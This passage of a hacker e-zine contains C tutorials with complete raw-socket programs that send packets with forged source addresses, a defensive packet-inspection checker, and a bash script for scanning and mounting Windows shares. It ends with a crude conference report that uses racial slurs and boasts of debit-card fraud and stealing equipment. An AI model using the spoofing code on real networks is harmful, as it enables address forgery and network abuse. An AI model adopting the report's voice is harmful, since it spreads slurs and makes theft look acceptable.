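const uint8_t kUdpBadLen[32] = {
    0x45,0x00,0x00,0x20, 0x04,0xd2,0x00,0x00, 0xfa,0x11,0xa7,0xf8, 0x0a,0x00,0x00,0x01, 0x0a,0x00,0x00,0x02,
    0x04,0x57,0x00,0x89, 0x00,0x20,0x00,0x00, 'p','i','n','g' };
/* The IP header of kUdpGood with its checksum field cleared, as a sender first builds it. */
const uint8_t kIpHdrNoCsum[20] = {
    0x45,0x00,0x00,0x20, 0x04,0xd2,0x00,0x00, 0xfa,0x11,0x00,0x00, 0x0a,0x00,0x00,0x01, 0x0a,0x00,0x00,0x02 };

/* Accumulate 16-bit big-endian words into a 32-bit one's-complement sum (RFC 1071). */
static uint32_t csum_add(uint32_t sum, const uint8_t *buf, size_t len)
{
    size_t i;
    for (i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)buf[i] << 8 | buf[i + 1];
    if (i < len) sum += (uint32_t)buf[i] << 8;   /* odd trailing byte, zero padded */
    return sum;
}

/* Fold the carries back in and complement. A buffer that already carries a correct
   checksum sums to 0xffff and therefore folds to 0 here. */
static uint16_t csum_fold(uint32_t sum)
{
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* IPv4 header checksum over the header only (ihl_bytes = ihl * 4). */
uint16_t ip_header_checksum(const uint8_t *ip, size_t ihl_bytes)
{
    return csum_fold(csum_add(0, ip, ihl_bytes));
}

/* Sum over the UDP pseudo-header, then the UDP header and data as they lie in memory. */
static uint16_t udp_sum(const uint8_t *ip, const uint8_t *udp, size_t udp_len)
{
    uint8_t pseudo[12];
    memcpy(pseudo, ip + 12, 8);          /* source and destination address from the IP header */
    pseudo[8] = 0;
    pseudo[9] = 17;                      /* protocol number for UDP */
    pseudo[10] = (uint8_t)(udp_len >> 8);
    pseudo[11] = (uint8_t)udp_len;
    return csum_fold(csum_add(csum_add(0, pseudo, sizeof pseudo), udp, udp_len));
}

/* Checksum a sender should place in the datagram; works on a copy with the
   checksum field zeroed. len is taken to be the IP total length. */
uint16_t udp_compute_checksum(const uint8_t *pkt, size_t len)
{
    uint8_t buf[1500];
    if (len > sizeof buf || len < 28) return 0;
    memcpy(buf, pkt, len);
    size_t ihl = (buf[0] & 0x0f) * 4;
    buf[ihl + 6] = buf[ihl + 7] = 0;     /* the checksum field itself counts as zero */
    uint16_t c = udp_sum(buf, buf + ihl, len - ihl);
    return c == 0 ? 0xffff : c;          /* 0 on the wire means "no checksum" over IPv4 */
}

/* Receiver-side validation of an IPv4 packet that is supposed to carry UDP. */
int udp_datagram_check(const uint8_t *pkt, size_t len)
{
    if (len < 28) return ERR_SHORT;
    if ((pkt[0] >> 4) != 4) return ERR_IP_VERSION;
    size_t ihl = (pkt[0] & 0x0f) * 4;
    size_t tot_len = (size_t)pkt[2] << 8 | pkt[3];
    if (ihl < 20 || tot_len < ihl + 8 || tot_len > len) return ERR_IP_LEN;
    if (ip_header_checksum(pkt, ihl) != 0) return ERR_IP_CSUM;
    if (pkt[9] != 17) return ERR_NOT_UDP;
    const uint8_t *udp = pkt + ihl;
    size_t udp_len = (size_t)udp[4] << 8 | udp[5];
    if (udp_len != tot_len - ihl) return ERR_UDP_LEN;   /* UDP header + data only */
    if ((udp[6] | udp[7]) && udp_sum(pkt, udp, udp_len) != 0) return ERR_UDP_CSUM;
    return UDP_OK;
}

int main(void)
{
    printf("ip checksum to fill in:  0x%04x\n", ip_header_checksum(kIpHdrNoCsum, 20));
    printf("udp checksum to fill in: 0x%04x\n", udp_compute_checksum(kUdpGood, sizeof kUdpGood));
    printf("good datagram -> %d, bad length -> %d\n",
           udp_datagram_check(kUdpGood, sizeof kUdpGood),
           udp_datagram_check(kUdpBadLen, sizeof kUdpBadLen));
    return 0;
}
```

The IP checksum comes out as 0xa7f8 and the UDP checksum as 0x0823, which are the
values already embedded in kUdpGood; the datagram with the oversized length field
is returned as ERR_UDP_LEN (6) without its payload ever being looked at.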

4.3 Code
^^^^^^^^
This code will send a spoofed UDP packet from 255.255.255.255 port 1111
to 127.0.0.1 port 137 (netbios-ns). Since we discussed the TCP code at
length, I will just explain a few things.

Here we use the linux/udp.h header file because we are now sending UDP
packets.

===[ snip ]============================================
#include <linux/udp.h>
===[ unsnip ]==========================================

Now we have to declare the udphdr pointer and add 'data', the size of the
segment that will be sent, to the packet buffer.

===[ snip ]============================================
int main(void) {
struct iphdr *iphdr;
struct udphdr *udphdr;
u_char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + data];
struct sockaddr_in target;
struct in_addr saddr, daddr;
int sock, on = 1;
===[ unsnip ]==========================================

Now we have to set what udphdr points to. Then we have to zero out
everything.

===[ snip ]============================================
iphdr = (struct iphdr *)packet;
udphdr = (struct udphdr *)(packet + sizeof(struct iphdr));
memset((char *)iphdr,'\0',sizeof(struct iphdr));
memset((packet+sizeof(struct udphdr)+sizeof(struct iphdr)),'\0',data); /* zero the data segment */
===[ unsnip ]==========================================

4.4 udpsp00f.c
^^^^^^^^^^^^^^
===[ cut here ]===============================================
/* udpsp00f.c for "Project Sp00fed" by Threx <threx@attrition.org> */
/* compile: gcc -o udpsp00f udpsp00f.c */
/* needed header files */
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <linux/ip.h> /* instead of using netinet/ip.h we use linux/ip.h */
#include <linux/udp.h> /* so this will only work on linux */



/* define the constants */
#define error -1
#define srcip "255.255.255.255" /* source address */
#define dstip "127.0.0.1" /* destination address */
#define sport 1111 /* source port */
#define dport 137 /* destination port(netbios-ns) */
#define data 69 /* the data segment that will be sent */

int main(void) {
struct iphdr *iphdr;
struct udphdr *udphdr;
u_char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + data];
struct sockaddr_in target;
struct in_addr saddr, daddr;
int sock, on = 1;

if ((sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == error) {
printf("socket error\n");
exit(1);
}

if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on)) == error) {
printf("setsockopt error\n");
exit(1);
}

iphdr = (struct iphdr *)packet;
udphdr = (struct udphdr *)(packet + sizeof(struct iphdr));
memset((char *)iphdr,'\0',sizeof(struct iphdr));
memset((packet+sizeof(struct udphdr)+sizeof(struct iphdr)),'0',data);

saddr.s_addr = inet_addr(srcip);
daddr.s_addr = inet_addr(dstip);

/* let's build a packet */
iphdr->ihl = 5;
iphdr->version = 4; /* this will always be 4 */
iphdr->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + data;
iphdr->id = 1234;
iphdr->ttl = 250; /* a length of time the packet will survive */
iphdr->protocol = 17;
iphdr->saddr = saddr.s_addr; /* source address */
iphdr->daddr = daddr.s_addr; /* destination address */
iphdr->check = 0;
udphdr->source = htons(sport); /* source port */
udphdr->dest = htons(dport); /* destination port */
udphdr->len = sizeof(struct iphdr) + sizeof(struct udphdr) + data;
udphdr->check = 0;


memset(&target,'\0',sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(dport);
target.sin_addr = daddr;



/* now let's send this packet */
printf("sending packet: ");
if (sendto(sock,&packet,sizeof(packet),0x0,(struct sockaddr *)&target,
sizeof(target)) != sizeof(packet)) {
printf("packet wasn't sent\n");
exit(1);
}
else {
printf("packet sent\n");
}
exit(0);
}
===[ done ]===================================================

5.0 ICMP
^^^^^^^^
ICMP, the Internet Control Message Protocol, is used to carry error and
control messages. For example, whenever you get some kind of error message,
Host Unknown or Port Unreachable, you can be sure ICMP had its part in it.

(NOTE: Creating ICMP packets is a little harder than TCP and UDP, so I've
decided to just create a simple echo reply message. However, there are many
other error messages that can be created. Please refer to the reference
section for more information.)

5.1 Echo Reply Message Layout
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

----------------------------------------------
| type | code | checksum |
|----------------------------------------------|
| identifier | sequence number |
|----------------------------------------------|
| data |
----------------------------------------------

5.2 The Fields
^^^^^^^^^^^^^^
There are 6 fields that must be filled in order to send out an error
message with ICMP.

# type = This is the message type for the error message. Some examples are
0 = echo reply, 8 = echo request. Here they are from the ICMP header
file.

`Taken from /usr/include/linux/icmp.h'
#define ICMP_ECHOREPLY 0 /* Echo Reply */
#define ICMP_DEST_UNREACH 3 /* Destination Unreachable */
#define ICMP_SOURCE_QUENCH 4 /* Source Quench */
#define ICMP_REDIRECT 5 /* Redirect (change route) */
#define ICMP_ECHO 8 /* Echo Request */
#define ICMP_TIME_EXCEEDED 11 /* Time Exceeded */
#define ICMP_PARAMETERPROB 12 /* Parameter Problem */
#define ICMP_TIMESTAMP 13 /* Timestamp Request */
#define ICMP_TIMESTAMPREPLY 14 /* Timestamp Reply */
#define ICMP_INFO_REQUEST 15 /* Information Request */
#define ICMP_INFO_REPLY 16 /* Information Reply */
#define ICMP_ADDRESS 17 /* Address Mask Request */
#define ICMP_ADDRESSREPLY 18 /* Address Mask Reply */
#define NR_ICMP_TYPES 18

# code = These are the codes for unreachable hosts or ports, time exceeded,
or for redirecting nets or hosts. Here are all the codes from the ICMP
header file.

`Taken from /usr/include/linux/icmp.h'
/* Codes for UNREACH. */
#define ICMP_NET_UNREACH 0 /* Network Unreachable */
#define ICMP_HOST_UNREACH 1 /* Host Unreachable */
#define ICMP_PROT_UNREACH 2 /* Protocol Unreachable */
#define ICMP_PORT_UNREACH 3 /* Port Unreachable */
#define ICMP_FRAG_NEEDED 4 /* Fragmentation Needed/DF set */
#define ICMP_SR_FAILED 5 /* Source Route failed */
#define ICMP_NET_UNKNOWN 6
#define ICMP_HOST_UNKNOWN 7
#define ICMP_HOST_ISOLATED 8
#define ICMP_NET_ANO 9
#define ICMP_HOST_ANO 10
#define ICMP_NET_UNR_TOS 11
#define ICMP_HOST_UNR_TOS 12
#define ICMP_PKT_FILTERED 13 /* Packet filtered */
#define ICMP_PREC_VIOLATION 14 /* Precedence violation */
#define ICMP_PREC_CUTOFF 15 /* Precedence cut off */
#define NR_ICMP_UNREACH 15 /* instead of hardcoding immediate values */

/* Codes for REDIRECT. */
#define ICMP_REDIR_NET 0 /* Redirect Net */
#define ICMP_REDIR_HOST 1 /* Redirect Host */
#define ICMP_REDIR_NETTOS 2 /* Redirect Net for TOS */
#define ICMP_REDIR_HOSTTOS 3 /* Redirect Host for TOS */

/* Codes for TIME_EXCEEDED. */
#define ICMP_EXC_TTL 0 /* TTL count exceeded */
#define ICMP_EXC_FRAGTIME 1 /* Fragment Reass time exceeded */

# checksum = This is the checksum for the ICMP packet. It is computed just
like the IP checksum (the RFC 1071 ones' complement sum), but over the
whole ICMP message rather than over the IP header.

# identifier = This field's value is used to match echo replies to echo
requests.

# sequence number = This identifies the sequence of the echo messages. It is
used when more than one is sent.

# data = This is the echo message's data; an echo reply carries back whatever
data was received in the echo request.

5.3 icmpsp00f.c
^^^^^^^^^^^^^^^
Well, since I have explained tcpsp00f.c and udpsp00f.c, this next code,
icmpsp00f.c, should come as no surprise to you.

This will send a simple echo reply with a port unreached message from
255.255.255.255 to 127.0.0.1.


===[ cut here ]===============================================
/* icmpsp00f.c for "Project Sp00fed" by Threx <threx@attrition.org> */
/* compile: gcc -o icmpsp00f icmpsp00f.c */
/* needed header files */
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <linux/ip.h> /* instead of using netinet/ip.h we use linux/ip.h */
#include <linux/icmp.h> /* so this will only work on linux */



/* define the constants */
#define error -1
#define srcip "255.255.255.255" /* source address */
#define dstip "127.0.0.1" /* destination address */
#define dabuf (sizeof(struct icmphdr) + sizeof(struct iphdr))


/* RFC 1071 ones' complement checksum. With IP_HDRINCL the kernel fills in the
ip header checksum for us but NOT the icmp one, so we compute it ourselves or
the receiving stack silently drops the message */
unsigned short in_cksum(unsigned short *ptr, int nbytes) {
long sum = 0;
unsigned short oddbyte;

while (nbytes > 1) {
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1) { /* trailing odd byte */
oddbyte = 0;
*((u_char *)&oddbyte) = *(u_char *)ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (unsigned short)~sum;
}

int main(void) {
struct iphdr *iphdr;
struct icmphdr *icmphdr;
u_char buff[dabuf];
struct sockaddr_in target;
struct in_addr saddr, daddr;
int sock, on = 1;

if ((sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == error) {
printf("socket error\n");
exit(1);
}

if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on)) == error) {
printf("setsockopt error\n");
exit(1);
}

iphdr = (struct iphdr *)buff;
icmphdr = (struct icmphdr *)(buff + sizeof(struct iphdr));
bzero((char *)iphdr,sizeof(struct iphdr));
bzero((char *)icmphdr,sizeof(struct icmphdr));

saddr.s_addr = inet_addr(srcip);
daddr.s_addr = inet_addr(dstip);

/* let's build a packet */
iphdr->ihl = 5;
iphdr->version = 4; /* this will always be 4 */
iphdr->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr); /* linux fills this in anyway */
iphdr->id = 1234;
iphdr->ttl = 250; /* hop limit: how many routers the packet may cross */
iphdr->protocol = 1; /* icmp */
iphdr->saddr = saddr.s_addr; /* source address */
iphdr->daddr = daddr.s_addr; /* destination address */
iphdr->check = 0; /* the kernel computes the ip checksum */
icmphdr->type = 0; /* this is an echo reply */
icmphdr->code = 3; /* this code means the port wasn't reached */
icmphdr->un.echo.sequence = htons(rand()); /* 16 bit fields, so htons, not htonl */
icmphdr->un.echo.id = htons(rand());
icmphdr->checksum = 0; /* must be zero while the checksum is computed */
icmphdr->checksum = in_cksum((unsigned short *)icmphdr, sizeof(struct icmphdr));

memset(&target,'\0',sizeof(target));
target.sin_family = AF_INET;
target.sin_addr = daddr;

/* now let's send this packet */
printf("sending packet: ");
if (sendto(sock,(char *)buff,sizeof(buff),0x0,(struct sockaddr *)&target,
sizeof(target)) != sizeof(buff)) {
printf("packet wasn't sent\n");
exit(1);
}
else {
printf("packet sent\n");
}
return 0;
}
===[ done ]===================================================
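As an added example (not code from Project Sp00fed), here is the receiving side of sections 4 and 5: a checker that parses an IPv4 packet, verifies the IP and ICMP checksums (RFC 1071) and flags what a host or ingress filter would reject, run over constructed vectors modelled on udpsp00f.c and icmpsp00f.c. The vectors' id and sequence values are made up, and the 192.0.2.7 source in the third vector is an assumed documentation-range address.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Findings from inspecting one packet, OR-ed together. */
enum {
    PKT_OK            = 0,
    PKT_TRUNCATED     = 1,  /* shorter than its headers claim */
    PKT_BAD_IP_CSUM   = 2,
    PKT_MARTIAN_SRC   = 4,  /* source address that can never be legitimate (RFC 1812) */
    PKT_BAD_UDP_LEN   = 8,  /* UDP length field disagrees with the IP total length */
    PKT_BAD_ICMP_CSUM = 16,
    PKT_BAD_ICMP_CODE = 32  /* echo or echo reply with a non-zero code (RFC 792) */
};

/* RFC 1071 ones' complement checksum, shared by IP, ICMP and UDP.
   Run over a header that already carries its checksum it yields 0. */
uint16_t inet_csum(const uint8_t *p, size_t len) {
    uint32_t sum = 0;
    for (; len > 1; len -= 2, p += 2) sum += (uint32_t)((p[0] << 8) | p[1]);
    if (len) sum += (uint32_t)p[0] << 8;                /* trailing odd byte */
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Inspect an IPv4 packet as it arrives on the wire (network byte order). */
int inspect_packet(const uint8_t *pkt, size_t len) {
    int f = PKT_OK;
    size_t ihl, tot, l4len;
    const uint8_t *l4;
    if (len < 20 || (pkt[0] >> 4) != 4) return PKT_TRUNCATED;
    ihl = (size_t)(pkt[0] & 0x0f) * 4;
    tot = be16(pkt + 2);
    if (ihl < 20 || tot < ihl || tot > len) return PKT_TRUNCATED;
    if (inet_csum(pkt, ihl) != 0) f |= PKT_BAD_IP_CSUM;
    /* limited broadcast, loopback and multicast never appear as a source */
    if ((pkt[12] & pkt[13] & pkt[14] & pkt[15]) == 0xff || pkt[12] == 127 || pkt[12] >= 224)
        f |= PKT_MARTIAN_SRC;
    l4 = pkt + ihl;
    l4len = tot - ihl;
    if (l4len < 8) return f | PKT_TRUNCATED;           /* UDP and ICMP headers are 8 bytes */
    if (pkt[9] == 17 && be16(l4 + 4) != l4len) f |= PKT_BAD_UDP_LEN;
    if (pkt[9] == 1) {
        if (inet_csum(l4, l4len) != 0) f |= PKT_BAD_ICMP_CSUM;
        if ((l4[0] == 0 || l4[0] == 8) && l4[1] != 0) f |= PKT_BAD_ICMP_CODE;
    }
    return f;
}

/* Stands in for the kernel, which always fills the IP header checksum on an
   IP_HDRINCL raw socket (the ICMP checksum it leaves alone). */
static void fill_ip_csum(uint8_t *pkt) {
    uint16_t c;
    pkt[10] = pkt[11] = 0;
    c = inet_csum(pkt, (size_t)(pkt[0] & 0x0f) * 4);
    pkt[10] = (uint8_t)(c >> 8); pkt[11] = (uint8_t)c;
}

/* Constructed vector modelled on udpsp00f.c: 255.255.255.255 -> 127.0.0.1,
   udp 1111 -> 137, id 1234, ttl 250, 69 zero bytes of payload.  The UDP
   length (97) was written in host order on a little-endian box, so the wire
   reads 0x6100. */
uint8_t udp_vec[97] = {
    0x45,0x00,0x00,0x61, 0xd2,0x04,0x00,0x00, 0xfa,0x11,0x00,0x00,
    0xff,0xff,0xff,0xff, 0x7f,0x00,0x00,0x01,
    0x04,0x57,0x00,0x89, 0x61,0x00,0x00,0x00  /* payload stays zero */
};

/* Constructed vector modelled on icmpsp00f.c: same addresses, type 0 (echo
   reply) with code 3 and the ICMP checksum left at zero; id/seq are made up. */
uint8_t icmp_vec[28] = {
    0x45,0x00,0x00,0x1c, 0xd2,0x04,0x00,0x00, 0xfa,0x01,0x00,0x00,
    0xff,0xff,0xff,0xff, 0x7f,0x00,0x00,0x01,
    0x00,0x03,0x00,0x00, 0x12,0x34,0x00,0x01
};

int inspect_udp_vec(void)  { fill_ip_csum(udp_vec);  return inspect_packet(udp_vec, sizeof udp_vec); }
int inspect_icmp_vec(void) { fill_ip_csum(icmp_vec); return inspect_packet(icmp_vec, sizeof icmp_vec); }

/* The same echo reply done right: code 0, ICMP checksum computed (bytes 22-23
   of icmp_vec are already zero), and a routable source (192.0.2.7, assumed). */
int inspect_fixed_icmp(void) {
    uint8_t v[28];
    uint16_t c;
    memcpy(v, icmp_vec, sizeof v);
    v[12] = 192; v[13] = 0; v[14] = 2; v[15] = 7; v[21] = 0;
    c = inet_csum(v + 20, 8);
    v[22] = (uint8_t)(c >> 8); v[23] = (uint8_t)c;
    fill_ip_csum(v);
    return inspect_packet(v, sizeof v);
}

int main(void) {
    printf("udp spoof   : findings 0x%02x\n", inspect_udp_vec());    /* 0x0c */
    printf("icmp spoof  : findings 0x%02x\n", inspect_icmp_vec());   /* 0x34 */
    printf("fixed reply : findings 0x%02x\n", inspect_fixed_icmp()); /* 0x00 */
    return 0;
}
```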

6.0 Reference
^^^^^^^^^^^^^
Socket Programming:
http://www.ecst.csuchico.edu/~beej/guide/net/

IPv4:
rfc791 = Internet Protocol
rfc1349 = Type of Service in the Internet Protocol Suite

TCP:
rfc793 = Transmission Control Protocol
rfc1323 = TCP Extensions for High Performance

UDP:
rfc768 = User Datagram Protocol

ICMP:
rfc792 = Internet Control Message Protocol
rfc1256 = ICMP Router Discovery Messages
rfc1788 = ICMP Domain Name Messages



[KV10's 30 Second Useful Script]=================================[Digital Ebola]


Looking at open Windows shares? Tired of typing all that samba crap? Or maybe
you just can't remember how to type samba stuff? Well, this issue's 30 second
script may be just for you. You need to have the Samba tools installed, and a
program called NBTscan. In case you have never heard of either, Samba is a set
of utilities that allows you to view and mount Windows shares. It could be one
of the best pieces of reverse engineering that has ever come out of the Linux
community.

NBTscan is a binary that will query the NetBIOS name service of a Windows
machine, and obtain its NetBIOS name, MAC address, and the login name of the
current user. Both Samba and NBTscan can be obtained at http://www.freshmeat.net.

#!/bin/bash
# WINCHECK: wraps nbtscan, smbclient and smbmount so you don't have to
# remember the syntax. Variables are quoted so names with spaces survive.

echo ------------------------------------------------------------------------
echo WINCHECK 1.0 by Digital Ebola -digi@legions.org-
echo ------------------------------------------------------------------------
echo
echo
echo Enter IP address:
read -r IP
# NetBIOS name, MAC address and logged-in user of the host
nbtscan "$IP"
echo
echo Enter NetBIOS name:
read -r NAME
# list the shares the host offers
smbclient -L "$NAME" -I "$IP"
echo
echo Enter share to mount:
read -r SHARE
# mount the chosen share under /mnt
smbmount "//$NAME/$SHARE" /mnt -o "ip=$IP"
echo
echo ------------------------------------------------------------------------


[Booty Con 2000, An Account of the Hackercon Rubicon]===================[sodium]

Prequel:
The MOB had envisioned plans to attend Rubi Con 2000 since the first con had
happened in 1999. For a variety of reasons the group was unable to attend the
99 convention, but that just made our drive to reach the con stronger. The
initial planning started rolling about 2-3 months before the con was
scheduled. The word was spread among the group and interest was sparked. A
month before the con was scheduled members Tophat, sodium, Tradeser, Jouser,
and 2ezy were all planning on going, along with other local 513 people. The
plan was that sodium would drive his "fly ride" and pick up Tophat and Jouser
along the way. Two other local kids, Godlike and Lordsomer, were going to
hitch a ride with sodium as well. About 2 weeks before the con Tophat tried
to contact sodium to formalize the plans and found that sodium's telephone had
been disconnected (thanks Ma Bell). This caused some waves in our plans.
Right about this time as well, 2ezy informed Tophat that he was going to leave
his wife, which happened to be the only thing that allowed him to remain in the
country, and that he was going to hitchhike to Tophat's dorm room where he
would live and avoid the INS officers. As a result, since he would be
leaving his wife (who is a truck driver) he would not have any means to make it
to the con (he can't drive). Minus one member. In order to get in contact
with sodium, Tophat had MOB member DJ Ohki leave a note on sodium's apartment
door that read, "Call Tophat ASAP 556-####". Tophat, upon receiving the call
from sodium, learned that sodium had broken up with his fiancee, who was
cheating on him, and that she had moved out. Without her there to give him
mad head he sat naked in front of his computer until his telephone was cut off
for not paying any bills. He had also pawned his engagement ring to pay the
insurance for his "fly ride". Last minute plans were made, usually on the
payphone outside of sodium's apartment, for the con. About this time Jouser
informed Tophat that he most likely would not be able to attend the con on
account of him being scared of us. Another member down. 2:00 AM the NIGHT
before the convention, sodium calls and wakes up Tophat and informs him that
he only has $0.88 to his name. Tophat, while still more or less asleep,
agrees to help pay sodium's way but encourages sodium to get the money "some
way". Sodium contemplates knocking off a 24hr liquor store or pawning his
computer. Tophat explains to sodium that it would be useless to pawn his
computer to go to a computer convention. 7:00 am the day of the con sodium
calls up Tophat and informs him that he had scammed $100 off of his mom's
debit card and that he would be right over to pick up the other people to go
to the con.


DAY ONE:
Sodium is late picking up Tophat but eventually arrives and then they drive
over to LordSomer's house where he and Dynamis are waiting; they switch
cars and gear and start off. The car ride was pretty boring. The car ride is
about 6-7 hours and with pretty bland scenery. About 4-5 hours into the trip
Dynamis remarks, "I'm glad that I drove up here instead of sodium, I really
needed to get some experience on the expressway." Lordsomer, Tophat, and
sodium all look at each other. To make matters worse the hotel changed its
name two days before the con, without anyone knowing. So instead of looking
for the "Wyndam" hotel, we were supposed to be looking for the "Clariton". We
had to have passed by the hotel about 20 times. During the course of us
driving past the correct hotel, Dynamis' car started making funny sounds. We
pulled over, called AAA, and waited until Snoop Doggy Dogg's long lost twin
brother arrived in a tow truck and took our car (he didn't steal it, although
we thought that he did after we arrived at the car station before he did). We
then found the right hotel and proceeded to check in for the con; after check
in we picked up our car (it had a loose bolt in the right-front tire). We
walked back to the hotel and set up in the network room. At this time we began
to realize how much this con would suck. The whole con had about 7 people
walking around. Out of the 7 people we noticed a guy dressed in a business
suit and sodium was like "Niggaz, that's a fed." We thought, "well, maybe it's
early.. it will get better...." We met up with Tradeser who had reserved the
hotel rooms for us and went back to the hotel and checked into our rooms.
Then back to the con for a corporate level inspirational talk filled with
buzzwords like "revolution", "going past the edge" and "putting books on
the shelf". I can't even remember what other talks were given that night;
they must have been really interesting to say the least. The social
engineering contest, for which we were a sure win, was canceled because the
con organizers couldn't figure out how to set up a PBX. When we got back to
the hotel we basically fucked around with the camera and drank.

DAY TWO:
We slept until about noon and then went over to the con. We missed
the first two talks of the day but made it in time to catch the "intro to
networking and tcp/ip" talk. Sodium is still asleep at this point. This guy's
talk basically consisted of reading tcp/ip vocab words off of a PowerPoint
projection. We got up and walked out. TDYC!, a group which was scheduled to
give a few talks over the course of the con, never showed up and their talks
were canceled. Then we fucked around in the LAN room, waiting for them to get
the DHCP/ISDN line up so that we could connect our computers together. The
red v. blue hacking contest had been virtually canceled; the blue defense
boxes were taken off line. The "hacking contest" ended up being a bunch of
kids installing sniffers on the local DHCP network and other people going
around to other people's computers and giving themselves root accounts from
the console. Then we went off to listen to a talk by one of the con organizers
about "Failsafe Computing". After waiting around for about 45 min. we were
told that he was still sleeping in his room. After that we went back to the
hotel and just fucked around a bunch. After fucking around for a bit and
chilling at the beach-themed bar at the hotel and waking sodium's ass up, we
headed back to the con. After wasting about an hour or so phreaking the
payphones and getting sniffed in the LAN room, we went to a talk given by Tim
Cothers. He gave a talk on the anatomy of an internet attack, which basically
consisted of him breaking into an NT box remotely. This was the best talk at
the con (Tradeser took notes, hehe). Later that night there was the 2nd
round of hacker jeopardy, or what they called "Win NFF's Shirts". Tophat,
Lordsomer, and Tradeser made up the mobsters.net team and went up against 2
other teams made up of various people at the con. We absolutely got wh00ped.
The score was something similar to team #1: 21,000 pts., team #2: 7,000 pts.,
mobsters.net: 0 pts. Apparently team 1 had some crazy smart guy who won round
one; the con organizers then purposely made round 2 nearly impossible to try
to stump this guy (which, with 21,000 pts., didn't work too well). Then, out of
pity for not scoring any points, the mobsters.net team was allowed to advance
to the final round, and sodium jumped in for some fun. We placed second in
this, losing by a mere 1,000 pts. or so. This was kind of fun, but overly
rowdy with Lordsomer throwing objects at the guy who was asking questions.
During the middle of the game, Rev. George, a team #2 member, told everyone to
quiet down. Apparently during the commotion of the game he had lost his cell
phone. He borrowed his friend's phone so that he could ring his phone and
find out where it was. To little surprise, sodium's coat pocket starts
ringing. I mean seriously sodium, you should have taken the battery out. He
handed over the phone and we continued the game. During the course of the
whole day, Tradeser's friend had been chilling in the bar over at our hotel
and the bar at the hotel where the con was being held. All day she had been
drinking and talking to people. Apparently she had told everyone that she met
that there would be a party in room 303 (our room), and that everyone was
invited. We had absolutely no problem with this and continued to spread the
word. Sodium and Tophat headed back to the room for the party (the rest of
our crew just wanted to goof around on the 1kps lan... what party poopers!).
We get to our room and find it filled with about 20 guys and 1 girl,
Tradeser's friend. (note by sodium: Look, I was going to pimp on this girl
hardcore, but this little bitch "Eric Son" was mack'n her ass on the bed. Just
cause he can do a Rubik's cube in 2 min doesn't make him a mackdaddy,
niggaplease.) Then to make things worse, no one brought any booze. So we start
talking to some guy who agrees to go and get a keg and bring it back to the
other hotel. So we head back to the other hotel about a half an hour later to
try and find our keg guy. When we get there we find that he didn't come
through. So we find some friends of ours and go on a beer run. All brew was
paid for by NFF, wow, what a guy! We head back to the hotel all ready to go
and find a party going on in another room. Sodium and Tophat continued to get
drunk and party w/ various people from the con. Sodium and Bobonic are both
trying to get on some nasty girl who kept showing everyone her tits while the
rest of the room was playing poker and watching lesbian porn.
(sodium's note: it was good porn, and we even had a naked chick, btw, she
wasn't that nasty.)
Sodium heads back to the hotel and en route tries to pick up another skanky
girl. (sodium's note: This bitch had it going on, like, ghetto bootie) Tophat
scams some money off the drunk people there and heads back to the LAN room.
The LAN room was dead so he went back to the hotel and ended the night.

DAY THREE:
We woke up late, but realized that all of the talks that we would have missed
did not happen. Most people were unplugging all of their shit in the LAN
room and packing up their computers to go home. We went to listen in on the
debate over which OS sucks least. While we were waiting for the debate to get
started NFF pulled out his cell and started asking the crowd for numbers to
prank call. After calling random shit sodium shouts out the phone number of
his ex fiancee. What were you thinking man, how in the world could this end up
good? (sodium's note: I was thinking free phone sex, plus I was still drunk)
NFF called her up and explained that we were bored and had to kill some time
and asked if she had any funny stories about Sodium. NFF would then try to
relay whatever she said over the crowd's laughter. She told how Sodium had
gotten drunk off of 2 Zimas and then after only 2 insertions, he fell asleep
inside of her in their moment of intimacy, how she supported his broke ass,
and how he would sit naked on his beanbag and irc all day while she worked and
cooked. (total bullshit) Then she told how she would have Sodium wear dresses
and girl accessories to turn her on. (it was Halloween) Sod was blood red. To
get back at her Sod told a story about how he had made her "baaaaa" like a
sheep in the bedroom or something freaky like that. Sod was yelling his story
to NFF who was relaying it to Sod's ex. The crowd was just dying. Then,
Sodium runs up and grabs the phone and whispers "I'm sorry, I'm at a computer
con and they're making me do this.." (I was still wanting some pootang) After
the laughter died down, the crowd said their goodbyes and the debate was
started. LordSomer and Sodium took the side of Linux as sucking the least,
and while they put up a good fight, Win 9x took the cake (only because these
guys had the balls to represent Win 9x at a hacker con). After the debate we
grabbed some loot that was lying around the LAN room (we came out with about
20 CDs of software, a Leatherman tool, keys to a payphone, a swappable 1 gig HD
and a 120 MB HD, phone books, and a bunch of other stuff). We then got a
quick pic with the fed who had been following us around the whole con
(viewable on our webpage), and then we headed out to the car. We didn't stay
for the closing ceremonies. The drive home was pretty boring; sodium and
Tophat made calls to Jouser and other MOB members to make the ride go faster.
This included sodium scaring Jouser so bad he cried to his mommy. That ended
our Rubi-Con adventure. The experience was fun, but the con sucked dick. I'll
just save my money and check out HOPE or Defcon next time.

Outro:
Yo, this is sodium, ok.. a good side note to this is, the night after
the con, my ex-girlfriend came up to my apartment, and tried to tell me that
what I did at the con was very immature and stupid. I basically kicked her out
on her ass, and told her to go away. And I would also like to state for the
